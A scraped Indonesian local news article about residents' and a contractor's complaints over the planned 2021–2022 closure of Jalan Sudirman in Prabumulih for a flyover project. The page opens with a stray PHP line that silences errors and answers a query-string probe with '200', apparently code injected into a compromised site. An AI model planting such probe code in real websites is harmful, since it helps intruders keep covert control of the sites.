error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Keluhan Warga Terkait Rencana Penutupan Jalan Sudirman - SMI.COM

Home / MUARA ENIM

Sabtu, 18 September 2021 - 21:41 WIB

Keluhan Warga Terkait Rencana Penutupan Jalan Sudirman

MUARA ENIM, SMI-

Beredarnya himbauan yang berbunyi :”Diberitahukan kepada seluruh pengguna jalan jendral sudirman.Dari arah Muara enim ke palembang atau sebaliknya,bahwa mulai hari senin:20 september 2021 s/d 31-Desember-2022.Semua kendaraan roda 4 atau lebih,tidak dapat melewati jalan dalam kota prabumulih.karena jalan jendral sudirman,tepatnya di perlintasan kereta api di patih galung di tutup total ada pengerjaan FLY OVER PATIH GALUNG.mohon bantuan rekan-rekan sejawat untuk di sebarluaskan,arus lalu lintas di alihkan melalui jalan lingkar. Dishub Prabumulih

Rencana penutupan total jalan jendral sudirman di perlintasan rel kereta api patih galung,kecamatan prabumulih barat,kota prabumulih ,provinsi sumatera selatan. Yang akan di mulai hari senin 20-09-2021 s/d 31-12-2022.

Membuat dampak bagi masyarakat yan berdagang di sekitar jalan tersebut dan para pekerja pembangunan gedung kantor pengadilan agama kota prabumulih.

Setelah sebelumnya media ini menerbitkan tentang, pemberitaan:Dampak rekayasa arus lalu lintas untuk proyek fly over patih galung.hari awak media suara masyarakat indonesia.com,mewawancarai seorang manager proyek PT.Maega Anugerah Sehahtera (PT.MAS) Zaenal Abidin ST.pada kesempatan wawancara di lokasi pembangunan gedung kantor pengadilan agama.Di jalan jendral sudirman kelurahan patih galung,kecamatan prabumulih barat,kota prabumulih,provinsi sumatera selatan.

Baca Juga :  Cerita Danau Daye Di Sugih Waras Rambang

Zaenal Abidin ST sang manager proyek PT.maega Anugerah Sejahtera (PT.MAS).menuturkan kepada awak media ini,”Terkait dengan penutupan total tersebut ,kami berharap agar pihak terkait.agar memikirkan dampak yang dialami,terus terang dengan adanya pengalihan arus lalu lintas tersebut.kami selaku pelaksana pembangunan gedung kantor pengadilan agama kota prabumulih,juga merasakan dampaknya.karena secara otomatis material yang akan masuk kesini akan sedikit tertunda,iya kalau jalan lingkar lancar.kalau macet tentunya akan menghambat pengiriman material kesini.tentunya juga akan menghambat pekerjaan pembangunan gedung kantor pengadilan agama ini”,ujar Zaenal Abidin ST ,manager proyek PT.Maega Anugerah Sejahtera (PT.MAS).

Menanggapi berbagai dampak yang di sampaikan oleh para pedagang pinggir jalan (pada pemberitaan media ini yang kemarin) dan keluhan dari manager PT.MAS ,yang mengerjakan proyek pembangunan gedung kantor agama kota prabumulih.

Yang juga merupakan proyek strategis nasional (PSN).

Sementara itu menanggapi keluhan warga yang berjualan di pinggir jalan,sebagaimana di terbitkan pemberitaannya oleh media ini.serta menanggapi keluhan dari manager projek PT.MAS ,pada hari ini sabtu:18-09-2021.

Baca Juga :  Kapolda Sumatera Selatan Copot Kapolsek Gunung Megang Buntut Meledaknya Gudang BBM Ilegal

Ketua Organisasi Masyarakat Pemuda Pancasila (Ormas PP) Majelis Pimpinan Cabang Pemuda Pancasila (MPC PP) kota prabumulih Rifky Baday SH MKn.

Melalui sekretaris MPC PP kota Prabumulih Satrya Muda Putra SE,ketika di mintai tanggapan hari mengatakan:”Dalam hal penutupan jalan,untuk proses pembangunan fly over.pemerintah harus mengkaji ulang keputusan ini,berdasarkan pengamatan saya.setelah di sisialisasikan,masyarakat tidak menyetujui keputusan ini.apalagi masa pelaksanaan proyek ,bisa hampir 2 tahun.berarti penutupan pun bakal lama,kita harus mempertimbangkan puluhan pedagang,tambal ban dan masih banyak pihak yang mencari sesuap nasi dari jalan ini,bakal kehilangan potensi pendapatannya.

Apalagi di masa pandemi,yang serba sulit ini.tolong jangan lebih mempersulit mereka,minimal pihak pemerintah melalui pelaksana,menyiapkan jalan sementara.untuk mobil pribadi dan tonase kecil,apalagi kita tau fasilitas jalan lingkar belum memadai dan rawan pungli.serta tindak kriminal ,saya mengharapkan pemerintah bijaksana dalam mengambil keputusan.Dan mempertimbangkan nasib para pedagang di pinggir jalan dan masyarakat yang hendak ke pusat kota ini di sosialisasikan”.Tandas Satrya Muda Putra SE ,sembari mengakhiri perbincangan ini.

(Sunar)

Share :

Baca Juga

MUARA ENIM

HNU lnspektur Upacara HUT PAHLAWAN Di Muara Enim

MUARA ENIM

Tim GTKHNK35+ Muara Enim Berjuang Menuntut Hak Mereka Terpenuhi

MUARA ENIM

Rapat Kerja Dewan Presedium DOB RL2

MUARA ENIM

HABI YANSON Calon kepala Desa Sugih Waras Rambang Yang Kharismatik & Berpengalaman

MUARA ENIM

Pangdam II/Sriwijaya Mayjen TNI Agus Suhardi Pimpin Upacara Hari Infanteri Ke-73 DI Markas Yonif 141/AYJP

MUARA ENIM

50 Ribuan Kepala Desa Seluruh Indonesia Sampaikan Aspirasinya Ke DPR RI,Tuntut Revisi Undang-undang Desa Nomor 6 Tahun 2014

MUARA ENIM

19 PERSONIL POLDA SUMSEL RAIH PENGHARGAAN DARI KAPOLDA SUMSEL

MUARA ENIM

Gebyar Vaksin Presisi Dosis 1 & 2 Rezeki Akhir Tahun 2021 Bersama Polres Muara Enim